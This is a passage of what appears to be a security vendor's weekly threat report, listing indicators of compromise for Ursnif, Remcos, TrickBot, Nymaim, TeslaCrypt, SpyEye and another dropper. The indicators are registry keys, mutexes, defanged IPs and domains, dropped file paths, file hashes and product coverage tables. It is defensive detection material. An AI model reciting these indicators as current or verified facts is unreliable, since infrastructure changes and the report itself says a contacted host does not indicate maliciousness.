                  Files and or directories createdOccurrences
                  \dropped.exe83
                  %APPDATA%\<random, matching [A-Fa-z0-9]{5,8}.exe27
                  %APPDATA%\dropped.exe18
                  \<random, matching '[a-z]{4,7}'>.exe14
                  %TEMP%\dropped.exe11
                  %TEMP%\<random, matching '[a-z]{4,9}'>.exe10
                  %ProgramFiles(x86)%\dropped.exe9
                  %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\dropped.exe7
                  \svchost.exe6
                  \TEMP\svchost.exe2
                  %APPDATA%\java.exe2
                  %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe2
                  %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe2
                  %APPDATA%\winupdate.exe1
                  \WinLogonn.exe1
                  %SystemRoot%\dva.exe1
                  %APPDATA%\WinHostMngr.exe1
                  \systemerecoverys.exe1
                  %ProgramFiles(x86)%\svhost.exe1
                  \systemrecoverys.exe1
                  \bot.exe1
                  %APPDATA%\windows-proteccion.exe1
                  %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\jusched.exe1
                  \winlogon.exe1
                  \sys.exe1
                  *See JSON for more IOCs

                  File Hashes

                  023196a258c5e9a714f6b406a6cff36bb4c25d0471a1a56b4d3b9f46d150ae1f 036117b3b838ce7a20cc4aa6b798ff8fa3966f308c03517b14d90dcfa46d010f 0402e0947e984f6a2bf56ddecbd6aea51c73098cfc914b3c289577ccd446d493 075192c857c9c4bef7d18368321d31620e7e0539ecd96000a5393acb8813abea 075ff8393ee0c121d200490ff5506456b5c9450c1589208ac82d31f023929294 0acc97a4ffa1fa86dfecfa5f176a027aeeb4c065d155d93aba50760cfef2c6ff 0c3a2e27ef912b5fb6c17b241e86da27e1146ef0a3db01f8276fe9ba45608b8d 0f64335da1a12fa9ad82fd7103c8a1a981496528e892ab7a10ee3d1c05a3442b 15b85c9bc17b14a093640dfbc1fc1e9c926690ad27bd47eb8a5670449957e9c9 1d92e058049850136bf176705613903a52650693d1baa9ec9b01cb565754b47c 1f576661825d0daf76e1fe297f3de6f90ffd50f554a42dd0e86fc5cd623a2012 22ada87e79518993f2e3af9eba82a6da0dbd7bc3e77a8836454147cc3c3dec6e 27e0f993e69d6123d98b801d026538783e6bffa4678ac4b5343a8c4f96741ab0 282c5f61b701dde8aa4599ce99e1786352cc127317300f8e5e594b2eb3ea1351 29e79e990607b2674c17ef582029a79d447209d8d82ba9ecc5cf0018a38b2365 2a6d5846fc4ec275e50f48770ace19635917593f84373a735c6e05cf5142083e 2bb71d1684473592d3c09495e62de2266cd965a2aba39c2bb69184e1f0ed74ef 2ca36f83972e8da2e176dd2895ec3557f7566295111262d84ae89687b191fb36 2cc88246db7c82b8ad27b1ecf3f588f60321723b7eba960ccac648bf8eeb1cdf 2cdac4031b8316e693eb8871c8abdeee03887cc6608c4b7b11b6bc56d4df73df 2d9eba6cbdbd2f498e26eb3a73772681c5f7fce3c314154cdd5355e11da5bd4c 2dea18d05c5c85cbfe9adbf41213cc09696b6540b9204cb95f433275600722db 30a3c3d914a785eac190a4623ef59b3dc438bb92e9124f55e41d51e0385c8b2f 32eb0e0944dc52cfeb26207c283f9e757bdc8b8a8271be388fe3754782b4f696 3343e10482f4d67995994b94a16fa589f2f17a647c0891e67a0d082582db5add
                  *See JSON for more IOCs

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network SecurityThis has coverage
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid




                  Win.Malware.Ursnif-7139346-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE
                  Value Name: Blob
                  13
                  <HKCU>\SOFTWARE\MICROSOFT\IAM
                  Value Name: Server ID
                  6
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: apiMPQEC
                  5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: Client32
                  5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: Client64
                  5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: datat3hc
                  5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: Client
                  5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: Dmlogpui
                  5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877}
                  5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954}
                  5
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT 1
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT
                  Value Name: Client32
                  1
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT
                  Value Name: Client64
                  1
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT
                  Value Name: datat3hc
                  1
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT
                  Value Name: Dmlogpui
                  1
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT
                  Value Name: apiMPQEC
                  1
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT
                  Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877}
                  1
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT
                  Value Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954}
                  1
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT
                  Value Name: Client
                  1
                  MutexesOccurrences
                  Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}6
                  Local\{7FD07DA6-D223-0971-D423-264D4807BAD1}6
                  Local\{B1443895-5CF6-0B1E-EE75-506F02798413}6
                  {57774070-CAAC-A135-8C7B-9E6580DFB269}6
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  172[.]217[.]3[.]10117
                  13[.]107[.]21[.]2009
                  172[.]217[.]10[.]1109
                  204[.]79[.]197[.]2008
                  172[.]217[.]10[.]788
                  172[.]217[.]10[.]1338
                  185[.]251[.]38[.]1977
                  208[.]67[.]222[.]2226
                  172[.]217[.]12[.]1321
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  wai177iowjedidiah[.]xyz17
                  m18fwairving[.]club11
                  lvinnie65a41ay[.]com11
                  resolver1[.]opendns[.]com6
                  222[.]222[.]67[.]208[.]in-addr[.]arpa6
                  myip[.]opendns[.]com6
                  Files and or directories createdOccurrences
                  \{4BC230AC-2EB3-B560-90AF-42B9C45396FD}6
                  %TEMP%\RES<random, matching '[A-F0-9]{3,4}'>.tmp6
                  %TEMP%\<random, matching [A-F0-9]{4}>.bi16
                  %TEMP%\<random, matching '[a-z0-9]{8}'>.dll6
                  %TEMP%\<random, matching '[a-z0-9]{8}'>.out6
                  %TEMP%\<random, matching '[a-z0-9]{8}'>.0.cs6
                  %TEMP%\<random, matching '[a-z0-9]{8}'>.cmdline6
                  %TEMP%\CSC9FEC3429276401888B76E8C2AE68BB3.TMP1
                  %TEMP%\CSC3409E48E22F1400B95FE520264D3A47.TMP1
                  %TEMP%\CSC330E69B495C9470E8A307FDE1DCCAE.TMP1
                  %TEMP%\CSC330E69B495C9470E9A311BFDE1DCCAE.TMP1
                  %TEMP%\0xobqs0n.tmp1
                  %TEMP%\vvfb3gye.err1
                  %TEMP%\vvfb3gye.tmp1
                  %TEMP%\ntg1z15y.err1
                  %TEMP%\ntg1z15y.tmp1
                  %TEMP%\phcet32c.err1
                  %TEMP%\phcet32c.tmp1
                  %TEMP%\CSC330E69B495C9470E8A311AFDE1DCCAE.TMP1
                  %TEMP%\0xkjv12k.err1
                  %TEMP%\0xkjv12k.tmp1
                  %TEMP%\CSC330E69B495C9470EBA3DFFDE1DCCAE.TMP1
                  %TEMP%\rzfbq10e.err1
                  %TEMP%\rzfbq10e.tmp1
                  %TEMP%\bx1opn4f.err1
                  *See JSON for more IOCs

                  File Hashes

                  0783be77f30524f31ced2fab0a1da860a9bd443263e1611cf26e8073005e578e 1a98e6aaae47877a0eccd691746c91d260937a3f5c110755da606965c1112729 1ca181cb491b5bd981df55f1d7ac4396b6020d38b8620c34e5af7174acf2254b 290f09ae381279ab8c97e14aadca08e62c359a0b1ce3b957578ddd097ac22682 2ba692360c9ebb9790f0a84a76e7b735bed6ffb8c82bfc861721728b5981ebc5 2fe2ed37720da7b06e1582d735743f5222467b06d589870887e62d4b057d09f8 36f600ea6989ee9a6c8821333e44ddd25622ab6a0dc383078c9887dc77c95fee 62714af2a73da1a69d915d05daeba464f65946d957f980862df5aa000fc3c8b2 6b94f9e63d9734dc4667b47c283026772ae0559cec29623296607d611fa6aa01 781aac6cc4e782ce3877c41c20e0715fcc56f76dde8f42e2df41f157b27d131d 7cad4929dc9483277f7c181f4fc7abafba6d67e9cdd65fbffe3bee90c64a2fb2 b7daaa3a091bac248f83bcf00aeec568feb83c490a03575b91909d059c7c2723 c3f2f7bc2b88e59af96157f6cce9b4889b419ca29bdd4075dc09155cd6a4b97e d995b6aeace5dc5fc1dccc3867a15bc65cafff77b2cce3ad4a93b2ff840b1bbb da7254c6feea716f30e709db69d9972633bee2b75a2129933cfe4ec3bea33c92 dc001b6eefd1ea132d5ff7e4c2b8fbd5fb44e5c62b2b5a144a08693b26ece3fb e7ba9ea77e262f55862d8f7432603005fcb1d6c959e312a822c1bcfce48c2aba

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  Wsa N/A

                  Screenshots of Detection

                  AMP


                  ThreatGrid



                  Umbrella




                  Win.Trojan.Remcos-7136041-1

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKCU>\SOFTWARE\REMCOS_TBAKKPFJRCZYNTN 19
                  <HKCU>\SOFTWARE\REMCOS_TBAKKPFJRCZYNTN
                  Value Name: EXEpath
                  19
                  MutexesOccurrences
                  Remcos_Mutex_Inj19
                  remcos_tbakkpfjrczyntn19
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  SILKBROWN[.]BIZ19
                  Files and or directories createdOccurrences
                  %APPDATA%\hyerr19
                  %APPDATA%\hyerr\logs.dat19
                  %System32%\Tasks\Modelleres19
                  %APPDATA%\Foreshadower5.exe19

                  File Hashes

                  04db2630c447c200d6b66d5545ced5bfd9b713562c9f975d4b1e34a60399efce 06809f29aa449ee0c5eac9a3956c2e53c4f08ea9992d24a201659c00b1cd8a80 1192c287dde92fe1c792b2122730610e1493fe242098fbb3a2da3f0bbcff0626 1ae04864cf13504552ced7ea85ff535adf38477ff9ca04520ce2781d17303de7 2056c5c204c5196f274f6ceab3dfd7a57de789f3327eb3872de116e433571723 2da878702f8bd11ac4d210e8c328fcbd7eb9bf5825111ba4e3a8a364f3f0f0f1 37bbd1a2db56b164a2e02423b47bdcfcf84bbe8cd98d3d6d9a3a2a46d659bf94 48c1f4427696658634d1a1db9d351ca74671b59c68bf4c3fc822c8e5895f8a10 4a4e9ca03ae19a1e6fef6a7d6bed84dcd66b8b07b3b5328cde53a9b5b5b7d8bf 80529b7f15fd80fb3eb2d05a7d91484c27cc8620c2342dd941568e1ab8031aed 827e49a00bd502dba505b35fc404a490236f3a9016ccaa1b11ccd4551360de2b 859c379889a0137e40112063ae04cb3f035dd9292112da8b02e5af2c6aa8b253 8b991afe7eb5b58d3d6c9586251111a6b7536d76eaca894f92941da818503ae4 934fca8c3e096e138cd25db859f513aef629946222f33b5932672a55e526fe76 a4ed0124c0cc59e88b5443376886b0b71532231d977ba849e5f98a233b8707c6 c751e5a7e2e83bcdd10dcdca29cf08138d455856466f6bc35c3913bade7f6a28 cae9aa03dab3cb4fbad8dbc37a8418e8817ce2a4bc28187c9d98240190b292c3 dcfa83b2d25d02429dc00ed823f6492c9ca248e0b03140f31d638660e2b274aa e45b64e33fe69503ad8d584155d74299b1cff13f481464b190a2efd697845fdc

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  Wsa N/A

                  Screenshots of Detection

                  AMP


                  ThreatGrid




                  Win.Dropper.TrickBot-7135730-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
                  Value Name: Blob
                  9
                  MutexesOccurrences
                  Global\316D1C7871E1068
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  89[.]105[.]203[.]18410
                  192[.]3[.]146[.]1799
                  185[.]174[.]172[.]608
                  198[.]46[.]198[.]128
                  200[.]119[.]45[.]1407
                  37[.]228[.]117[.]2507
                  178[.]170[.]189[.]1176
                  82[.]118[.]21[.]996
                  185[.]172[.]129[.]1466
                  107[.]181[.]175[.]1225
                  190[.]13[.]190[.]1785
                  31[.]184[.]253[.]65
                  107[.]22[.]215[.]204
                  131[.]196[.]184[.]1414
                  187[.]58[.]56[.]264
                  198[.]12[.]97[.]2124
                  5[.]53[.]124[.]494
                  146[.]185[.]219[.]274
                  198[.]27[.]74[.]1463
                  172[.]217[.]3[.]1153
                  116[.]203[.]16[.]953
                  185[.]248[.]87[.]883
                  146[.]196[.]122[.]1673
                  189[.]80[.]134[.]1223
                  191[.]37[.]181[.]1523
                  *See JSON for more IOCs
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org15
                  api[.]ipify[.]org6
                  www[.]myexternalip[.]com4
                  ipecho[.]net4
                  ip[.]anysrc[.]net3
                  api[.]ip[.]sb3
                  checkip[.]amazonaws[.]com3
                  wtfismyip[.]com3
                  icanhazip[.]com2
                  ident[.]me1
                  ipinfo[.]io1
                  Files and or directories createdOccurrences
                  %APPDATA%\speedLan68
                  %APPDATA%\speedLan\data68
                  %APPDATA%\speedLan\settings.ini68
                  %System32%\Tasks\Speed lan library68
                  .68

                  File Hashes

                  04cc68fc30be714b023932e85456cf0bb960e7c72c0c07b27a0aeb35cf8fb71e 077e31a93f6d19f4d0a4912f1ffaf0f9cc5dca757fc4c305344b0322f9d95170 0bd995744b6007b5d81ca25eac6f2aac3a9f9b0973fb4d8c319d5efebe0beec0 0e035419a2cd340cd563c1ba4d6a5701191ed97514ff43b0ff72dec3a36b0b50 1089c586a612d0eb070bb3b7adaab25ca21a2b74f5f32503ee11a93191699917 114de28dcd95a63d6ce8d39e9c580c0eaa845e24cf2949ed3bf1abe8e1430bb1 11c4553afa84784bb7933a6985cbf5398080024a209ea93dacd3ab325696d94e 17a1a857bff381e82d53dd579f5e71a9e9618a76cc135270783304d74693875e 17a44bda03089760b062816b65c1a31389e0379a2cc0b56d7bfe5406f791799f 183b29273cdede74e44f33e83441715a1ffd299959ffd94b2822d6c57cf7ff97 1b6324a79bae59678f056144dc2ada1be75a9134705faa87be1071576b67d2b7 1c6dd29936b46416bfad1882fe8d274c5cc456506ced1e3099ac2f28ecc83e24 1cfba2808e9e1f061a78141b42924825ca42209c6a3c767b20036f8b9b36fc03 2029cac9beb5ddfd09f89c164d38df940c9c3df930adb8a9b1f72bbd2724cfc2 2237a25cdf59f0dfee59dbcaf2d2bcf4e1b9416345d0d8dcdfa69355d879705b 22e973106e2ed6be4e73b09d527e4da7c1bc5f6a963999dc84d111e1e15e36a3 24362b930aa0b37e09b100d7e85534660ac8c902282cada914c9653680461fb7 26b22ce48b355abd0e368a786b3006d5d7d3c706deed14a3d112eb6cbbd3f2f5 27a17876f662ff5a8e3cfb99fc6c3289ea89c33b3d86aadbc4725e923f59d394 2882bf641cd6e1a2c29345be31cac1ec05364e04a68e702265e3db6fee3abcbd 2c6236b1b928c9c1171ee9fdba7ab69b6aa138bbca47e25135b42a0bf71d4d05 2d35bf5612f6bf43f52a03a9f2ff6d7dc55dc1351989535a9b9303947008fc09 2e742af09eeb39431cc8ea672c688e1facc6c481ae5bde6f41510180c38da3c5 2f68006ccb92f292a9b3a2091ed24ca37a079515e8d1a8d04417ee02bcf72991 30b4637c55f9af07575f0c7e28135e9a3ca843f3ec2166dd240722b6a9899a85
                  *See JSON for more IOCs

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network SecurityThis has coverage
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid




                  Win.Dropper.Nymaim-7135710-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKCU>\SOFTWARE\MICROSOFT\GOCFK 14
                  <HKCU>\SOFTWARE\MICROSOFT\GOCFK
                  Value Name: mbijg
                  14
                  MutexesOccurrences
                  Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1}14
                  Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}14
                  Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5}14
                  Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368}14
                  Local\{306BA354-8414-ABA3-77E9-7A7F347C71F4}14
                  Local\{F58B5142-BC49-9662-B172-EA3D10CAA47A}14
                  Local\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}14
                  Local\{B888AC68-15DA-9362-2153-60CCDE3753D5}14
                  Local\{2DB629D3-9CAA-6933-9C2E-D40B0ACCAC9E}14
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  urbdld[.]com13
                  sgkwcf[.]in13
                  jzhqh[.]pw13
                  uyakvehnglm[.]in13
                  elshuxnhc[.]pw13
                  kuazdamnx[.]pw13
                  ukyffr[.]net13
                  cqgupfbw[.]com13
                  ylslbgzh[.]com13
                  bhbhsllaoxfp[.]in13
                  myiuumylf[.]pw13
                  ouwtnuaujnj[.]com13
                  kpmotg[.]com13
                  uyoegvucna[.]pw13
                  llenpvbww[.]pw13
                  biusulcp[.]com1
                  asmouxe[.]com1
                  retbiq[.]pw1
                  niyzb[.]com1
                  msktndng[.]net1
                  lmgdj[.]pw1
                  kxjoleveza[.]in1
                  scydgzjclxb[.]pw1
                  rqtppygwhgb[.]net1
                  rtsdhccwsyjf[.]pw1
                  *See JSON for more IOCs
                  Files and or directories createdOccurrences
                  %ProgramData%\ph14
                  %ProgramData%\ph\fktiipx.ftf14
                  %TEMP%\gocf.ksv14
                  %ProgramData%\<random, matching '[a-z0-9]{3,7}'>14
                  %APPDATA%\<random, matching '[a-z0-9]{3,7}'>14
                  %LOCALAPPDATA%\<random, matching '[a-z0-9]{3,7}'>14

                  File Hashes

                  2d4101e26a68ba841691664f2b102e003559458ea5df5010967a820c615bd218 300096cf851508538a09694a71597be71f9a1e7cbacb664053f7b9ec6ef56254 31912de803b6d94833ad5aac693904288d718d98a4db162369b88d28ce486814 324c4463deac99896a6d8634a7c0f1ca2b32de4638cad6a4d6c245d9f7f93567 56afe6eb98d99c184e1a83b105f1425a40f132a47221c2d8f389649879408636 5dab30eb9eb87f97f01eb64c06faaa361a39fc56403ebd36005f208c5e4cfe66 782c73cafa54de836efc2613e006ab4f39f91f65616b773d9ae46275957ec2f5 7c5709b104905ecb64a8a1dfd87a7d3f380405b5ee790074290f5d3348e2aae6 8d371e0fd91fe1b9b0bebdd6f3712ef6246c52dc6f37c4eaf53269fefa57d06b a6fac72b01757f7ba3c8d2789f40fc966e32c10260b14341640a3e8565da3544 b2eb0926631be37902d8f28965d64d5519057cbc46de07f7ea209d7a9ecbb9a4 b4e5f95ef5b0ea44950ec94584228e7243ef4a1b2a4baf93fe4bba1f853f2141 d6b1935b8be102d5fbd67b5551090775e1d41dc1baa5c7dbf0a128ca2ec35c39 f359759b3960ddf91cd3a70636731411f615db1b1dd27d343d698b9680560a49

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network SecurityThis has coverage
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  UmbrellaThis has coverage
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid



                  Umbrella




                  Win.Ransomware.TeslaCrypt-7135496-1

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
                  Value Name: EnableLinkedConnections
                  12
                  <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
                  Value Name: Blob
                  12
                  <HKCU>\SOFTWARE\ZSYS 12
                  <HKCU>\SOFTWARE\ZSYS
                  Value Name: ID
                  12
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Acrndtd
                  12
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
                  Value Name: CheckSetting
                  12
                  <HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'> 12
                  <HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'>
                  Value Name: data
                  12
                  MutexesOccurrences
                  2134-1234-1324-2134-1324-213412
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  198[.]185[.]159[.]14412
                  184[.]168[.]131[.]24112
                  213[.]185[.]87[.]2812
                  43[.]229[.]84[.]11612
                  35[.]195[.]98[.]22012
                  192[.]237[.]132[.]24811
                  204[.]79[.]197[.]2009
                  13[.]107[.]21[.]2008
                  216[.]239[.]36[.]214
                  216[.]239[.]34[.]213
                  216[.]239[.]38[.]213
                  216[.]239[.]32[.]211
                  78[.]47[.]139[.]1021
                  213[.]185[.]88[.]1331
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  myexternalip[.]com12
                  en[.]wikipedia[.]org12
                  www[.]torproject[.]org12
                  ogp[.]me12
                  opengraphprotocol[.]org12
                  static1[.]squarespace[.]com12
                  vr6g2curb2kcidou[.]expay34[.]com12
                  tsbfdsv[.]extr6mchf[.]com12
                  www[.]garrityasphalt[.]com12
                  gjesdalbrass[.]no12
                  garrityasphalt[.]com12
                  TESTADISENO[.]COM12
                  o7zeip6us33igmgw[.]onion[.]to12
                  diskeeper-asia[.]com12
                  kochstudiomaashof[.]de12
                  grassitup[.]com12
                  vrd463xcepsd12cd[.]crsoftware745[.]com12
                  grassitupbluegrass[.]com11
                  www[.]grassitupbluegrass[.]com11
                  Files and or directories createdOccurrences
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I5QX7W9.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I77RW1L.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I7J37KF.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I9NSD58.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IANXEE8.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IC5NB1M.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$ID60W3E.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IIUTK07.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IJE160U.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IKAVPAE.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IL2NS3P.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$INKC8CM.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IP8M1EE.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IPDP9E0.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$ISIYA4I.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IV54ALI.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IWK2JPN.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IWYYKMD.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IXC3P46.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IZ7KADN.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R0Y9SM6.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R0ZU5JT.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R478AKJ.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R4FI238.txt12
                  \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R4FKVBH.txt12
                  *See JSON for more IOCs

                  File Hashes

                  0d65ea3ded78d4d778f95fb7b578e0484156ce0664f96c9e670fc39ba32d9499 10dd7d41572281016bd1e00fbd9a620bed11449c7dcf80f9dfe421d7a2b495bb 1d13db5d78dd1f92c89884bf62b01ce30bb66e61d5306b6a9e6d0c3fe8d449af 3d658a771cc4855faaadc1dc5e5bc22a832cc9dde7596bab6b3910e4d076d71c 5d3aae382c5e76531b67eb1216454da32380ed0b209d1d16f565481f2bd9f198 6056a5026ac23e431a4a966b0f1e76ea0563a0bddd4926c4ffb1a0301f57fa3e 67da257dd448e50c61118e2d18e72c5af4538cf0f34a455a551e66307d65bed1 6e98ef200aa863074266c6e0b793bb76cfa7e89226c48e2c85d299653ce6f6ab 9de6d3506741e86a78eab659f6320784feda15e442f909266567f033ed88d6a6 b59e53aa73396d311b5525080950567eaff847266a615f74a43592ef1b968444 bf77ab55ee1faad26faa871fd962f26aa49636ff8db5a8fb3fde52d3e4fcf7c3 e1e70ceb74927640f6c487d7ac6b6071a7d858e2b86001bdfc1fcaf5b826e866

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  UmbrellaThis has coverage
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid



                  Umbrella


                  Malware




                  Win.Dropper.SpyEye-7134261-0

                  Indicators of Compromise

                  MutexesOccurrences
                  __CLEANSWEEP__178
                  Global\5594cda1-c547-11e9-a007-00501e3ae7b59
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  23[.]218[.]40[.]16122
                  199[.]59[.]242[.]1514
                  213[.]155[.]29[.]1443
                  216[.]218[.]206[.]691
                  78[.]153[.]149[.]281
                  185[.]27[.]134[.]921
                  216[.]135[.]83[.]841
                  31[.]170[.]160[.]571
                  64[.]15[.]147[.]2051
                  66[.]90[.]97[.]71
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  e13678[.]dspb[.]akamaiedge[.]net8
                  www[.]yourbotnet2[.]cn6
                  www[.]microsoft-spynet[.]com2
                  carder[.]bit1
                  11776[.]BODIS[.]com1
                  www[.]teto[.]ly1
                  scorpions69[.]cwahi[.]net1
                  mybotnett[.]hostingsiteforfree[.]com1
                  egysn1[.]no-ip[.]biz1
                  poker365site[.]com1
                  www[.]yourbotnet[.]cn1
                  www[.]kokainpawer[.]com1
                  www[.]reskuesecurities[.]host[.]org1
                  www[.]secureantibot[.]net1
                  www[.]moawia2[.]eb2a[.]com1
                  www[.]microsoft-windows-security[.]com1
                  Files and or directories createdOccurrences
                  \cleansweep.exe178
                  \cleansweep.exe\cleansweep.exe177
                  \cleansweep.exe\config.bin175

                  File Hashes

